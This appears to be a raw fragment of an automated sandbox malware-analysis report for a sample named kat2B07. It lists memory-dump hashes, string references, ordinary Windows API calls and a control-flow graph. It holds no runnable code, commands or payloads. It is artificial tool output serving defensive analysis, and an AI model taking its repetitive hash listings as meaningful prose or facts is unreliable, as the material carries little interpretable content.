                                                                • Instruction Fuzzy Hash: ADE0BF35008750BFCB125F55EC49E4BBFB6AF48325F060D19F68561471C7B2A8A1AB42
                                                                Strings
                                                                • INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?), xrefs: 1D7D597E
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?)
                                                                • API String ID: 0-143322027
                                                                • Opcode ID: d52823f70adf4d4914a0887fe6302787e62ab69aa2800013c090a87ee1ab3edb
                                                                • Instruction ID: aa5b4ff925e735939ca21b7179cc6384473c7661f2860bdc073c21d3e817faa2
                                                                • Opcode Fuzzy Hash: d52823f70adf4d4914a0887fe6302787e62ab69aa2800013c090a87ee1ab3edb
                                                                • Instruction Fuzzy Hash: 6F11AFB5500605BFD7108F58CC84F96BBBDFF45328F014145FA0857262C3B2B4A4CBA2
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e4038abb6d1fc111187d28ee66f17f9e3b2efdb882336adb76a10e71e36a91bf
                                                                • Instruction ID: 5719535c2051fb7bac8e1dfbede8902a66914574ebb315d7037ae8de7222ac80
                                                                • Opcode Fuzzy Hash: e4038abb6d1fc111187d28ee66f17f9e3b2efdb882336adb76a10e71e36a91bf
                                                                • Instruction Fuzzy Hash: ED410676508211AFCB019F28EC4096BB7A5EF84234F054569F944972A1E736EC52CBB3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8969008ce381b23799d73fc7940baa6ab7e2ac6de20cda7f09aa82a1c7516ed2
                                                                • Instruction ID: 3169ac485a31f272da3b48b274ec38178124fd027eb5c427a5829110c14c8612
                                                                • Opcode Fuzzy Hash: 8969008ce381b23799d73fc7940baa6ab7e2ac6de20cda7f09aa82a1c7516ed2
                                                                • Instruction Fuzzy Hash: FA319AB4614201ABE700DF6DEC84F66B3E9FF59265F018629FA48C3351E771F910CAA2
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b65ced6347d06dbe970e0e8504f92dce261118504d39433ebc94e7536f098ff3
                                                                • Instruction ID: 24af98e627a5ba463ede9872fe50da00994ef6e9fc1c471f67a3a27550d888e2
                                                                • Opcode Fuzzy Hash: b65ced6347d06dbe970e0e8504f92dce261118504d39433ebc94e7536f098ff3
                                                                • Instruction Fuzzy Hash: 1F319EB5504701AFEB508F29DC84B2777F9EF84724F15482AF9468B261D771F850CB62
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7b08a3aaf8bf1a9ff2b8012a6c264b081eb5170c33ae149cd67c2931a75fdf8a
                                                                • Instruction ID: 2e3fea072c5012b468455e40a75f777e1b53f8ab17367eec7e92eb8eca8cc5bc
                                                                • Opcode Fuzzy Hash: 7b08a3aaf8bf1a9ff2b8012a6c264b081eb5170c33ae149cd67c2931a75fdf8a
                                                                • Instruction Fuzzy Hash: 7911E7797042117BE7149B289C44F6B77AEEFC0765F090D18FA85D3291E632E911C7A3
                                                                Strings
                                                                • GetEnabledXStateFeatures, xrefs: 1D910C61
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: GetEnabledXStateFeatures
                                                                • API String ID: 0-1068256093
                                                                • Opcode ID: 9d7da993b14afc806ad76a57a56d893e3e01ebcd937dcfaf3d698b38ff9820c3
                                                                • Instruction ID: 8ec48805395f82bfd97c8e2c7afd2842d200afbff13d20452f83a08102a6926e
                                                                • Opcode Fuzzy Hash: 9d7da993b14afc806ad76a57a56d893e3e01ebcd937dcfaf3d698b38ff9820c3
                                                                • Instruction Fuzzy Hash: 55F0C83570513CB7DF133B60DC08BAE3A16AF81770F010025FE0C2A251DB3658118AC2
                                                                APIs
                                                                • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,1D914F85,00000000,00000000,00000000), ref: 1D914DEE
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID: InformationTimeZone
                                                                • String ID:
                                                                • API String ID: 565725191-0
                                                                • Opcode ID: 36863b840b3fe95f6c42f7464d0e1aed5811de4f56267909143a4cada2a82141
                                                                • Instruction ID: 585c2d443810e6c27f0e9ea837e24acfce45ce03387592aa3a09ded8110fbbaa
                                                                • Opcode Fuzzy Hash: 36863b840b3fe95f6c42f7464d0e1aed5811de4f56267909143a4cada2a82141
                                                                • Instruction Fuzzy Hash: 78412976904229BBCB15AF74DC85A9E7B78BF05270B124259E614EF2A0DB30AD00CFD2
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bcd720519f0502a74e6e1e516fbbe569aab1b8d7403c0a7ec9085219fb0d3575
                                                                • Instruction ID: c051c4ead48f2ca158fe9db6207c7bf6943ebcc50aa682bc7765aa067590e73f
                                                                • Opcode Fuzzy Hash: bcd720519f0502a74e6e1e516fbbe569aab1b8d7403c0a7ec9085219fb0d3575
                                                                • Instruction Fuzzy Hash: C6019EF46141419BF715CF28E884A1A73E9BFA8264F15046BEA84D3391FA29E805CB73
                                                                APIs
                                                                • EnumSystemLocalesW.KERNEL32(1D90FF01,00000001,1D96D298,0000000C,1D910A92,?), ref: 1D90FF4F
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID: EnumLocalesSystem
                                                                • String ID:
                                                                • API String ID: 2099609381-0
                                                                • Opcode ID: 4001d9781309c26d7aad51332f81ea48954eed7f92bdfcfb1fc583393c88fe12
                                                                • Instruction ID: fc03125e58dc1c25e1f52150c688d41925eef5a65269698c4615c5770bf16746
                                                                • Opcode Fuzzy Hash: 4001d9781309c26d7aad51332f81ea48954eed7f92bdfcfb1fc583393c88fe12
                                                                • Instruction Fuzzy Hash: 3FF0497AA08214EFDB04DFA8E485B9D77B0FB4A365F10426AE514DB3A1C7795900CF41
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 875602c2f73a52c0c9a6f148e04de174215d237d3759911a04e6fd69f05410ec
                                                                • Instruction ID: ecb54fe6f1546b5db68d9acc2c48a3ffafd7cd4081423f552112543849eaedd8
                                                                • Opcode Fuzzy Hash: 875602c2f73a52c0c9a6f148e04de174215d237d3759911a04e6fd69f05410ec
                                                                • Instruction Fuzzy Hash: 7BB048B6408641BFAB41AA089C0087AB7BAFBC0220F848D48B9A440031D33298289A12
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 1D8D4A98
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: ee65b1bb0741323167501787b16e944060e4fbce55ac73e3ad2cf55b830380c0
                                                                • Instruction ID: a2ed48823b8a1ed81b628b637f83bf4afa73a4dbc3d880879d8c2b2e6ec93ca0
                                                                • Opcode Fuzzy Hash: ee65b1bb0741323167501787b16e944060e4fbce55ac73e3ad2cf55b830380c0
                                                                • Instruction Fuzzy Hash: 569002B4544616AA9F4596D9DE495A567306656A56B404170A00D64446552801018A37
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: GetSystemTimePreciseAsFileTime
                                                                • API String ID: 0-595813830
                                                                • Opcode ID: 0aa9b4dee67282f8868948c8082944bd889c18d14751ad9a956530ee5d0f773f
                                                                • Instruction ID: bab96c1201d2d7b92bccfea33108921a43ea8dd99cb785bd09c70e9b85788f2f
                                                                • Opcode Fuzzy Hash: 0aa9b4dee67282f8868948c8082944bd889c18d14751ad9a956530ee5d0f773f
                                                                • Instruction Fuzzy Hash: 9A412634600305EFCB12DF54D884AAEBBF9FF45734B00895DE59A97252D731BA02CB92
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID: HeapProcess
                                                                • String ID:
                                                                • API String ID: 54951025-0
                                                                • Opcode ID: 99032344225efad0e2d3d5d1066beed28596d492c8006800e60ae54c42b64947
                                                                • Instruction ID: c12e492f702fd61a867d82330ded65faa272728c20a42df62ea1def442f1e677
                                                                • Opcode Fuzzy Hash: 99032344225efad0e2d3d5d1066beed28596d492c8006800e60ae54c42b64947
                                                                • Instruction Fuzzy Hash: 3CB01230705221CFD3804F72454530E35BC7F1B5E0300C319D004C4240D63844404F13

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 769 1d815660-1d8156c7 770 1d815bc2-1d815bf8 call 1d73395e call 1d7325bd 769->770 771 1d8156cd-1d8156e9 call 1d733ed6 * 2 769->771 780 1d8156f0-1d8156f5 771->780 780->780 781 1d8156f7-1d8156ff 780->781 782 1d815700-1d815705 781->782 782->782 783 1d815707-1d815710 call 1d733af3 782->783 786 1d815716-1d81572e call 1d86b5d0 783->786 787 1d815baa-1d815bc1 call 1d7325bd 783->787 786->787 792 1d815734-1d8157e1 call 1d73263a call 1d734002 * 3 call 1d7347dc call 1d8653c0 call 1d731f5a 786->792 807 1d8157e3-1d8157ec 792->807 808 1d81584a-1d81585a call 1d731f5a 792->808 810 1d81580b-1d81580d 807->810 811 1d8157ee-1d815809 call 1d8653c0 807->811 815 1d815860-1d815866 808->815 816 1d815a1a 808->816 810->808 814 1d81580f-1d81582d call 1d8653c0 810->814 822 1d815833-1d815848 call 1d731f5a 811->822 814->822 815->816 820 1d81586c-1d815871 815->820 821 1d815a1f-1d815a23 816->821 824 1d815891 820->824 825 1d815873-1d81587e 820->825 826 1d815b95-1d815ba9 call 1d7325bd 821->826 827 1d815a29-1d815a32 821->827 822->807 822->808 832 1d815894-1d8158a7 call 1d732f5e 824->832 825->824 829 1d815880-1d815884 825->829 830 1d815a83-1d815ad3 call 1d73420f * 9 827->830 831 1d815a34-1d815a38 827->831 829->824 837 1d815886-1d81588f call 1d8b0a60 829->837 907 1d815ad5-1d815adc 830->907 908 1d815b2a 830->908 831->830 838 1d815a3a-1d815a50 831->838 832->816 845 1d8158ad-1d8158b1 832->845 837->832 842 1d815a52-1d815a59 838->842 843 1d815a5c-1d815a6b call 1d83c550 838->843 842->843 853 1d815a77-1d815a80 call 1d73420f 843->853 854 1d815a6d-1d815a74 843->854 849 1d8158d0-1d8158e2 call 1d732e00 845->849 850 1d8158b3-1d8158ce call 1d73395e 845->850 865 1d8158e4-1d8158f5 call 1d732c39 call 1d73395e 849->865 866 1d8158fe-1d815905 849->866 863 1d8158f8-1d8158fc 850->863 853->830 854->853 863->866 865->863 868 1d815907-1d81590e 866->868 869 1d815949 866->869 872 1d815910-1d815917 868->872 873 1d81591a-1d81593e 868->873 878 1d815950 869->878 872->873 883 1d815953-1d815955 873->883 894 1d815940-1d815947 873->894 878->883 883->821 884 1d81595b-1d815967 883->884 886 1d815969-1d81596c 884->886 887 1d81596e-1d815971 884->887 890 1d815984-1d8159a0 call 1d73395e 886->890 891 1d815973-1d815978 887->891 892 1d81597a-1d81597d 887->892 890->821 891->890 895 1d8159a2-1d8159c2 call 1d7dbcf0 892->895 896 1d81597f 892->896 894->878 895->821 906 1d8159c4-1d8159e4 call 1d8169c0 895->906 896->890 918 1d8159e6-1d8159fd call 1d732c39 call 1d73395e 906->918 919 1d8159ff-1d815a19 call 1d7325bd 906->919 910 1d815b20 907->910 911 1d815ade-1d815ae5 907->911 912 1d815b2f-1d815b36 908->912 922 1d815b27 910->922 914 1d815af1-1d815b15 911->914 915 1d815ae7-1d815aee 911->915 916 1d815b38-1d815b3a 912->916 917 1d815b8b-1d815b92 912->917 914->912 935 1d815b17-1d815b1e 914->935 915->914 923 1d815b46-1d815b6a 916->923 924 1d815b3c-1d815b43 916->924 917->826 918->821 922->908 923->826 937 1d815b6c-1d815b8a call 1d7325bd 923->937 924->923 935->922
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
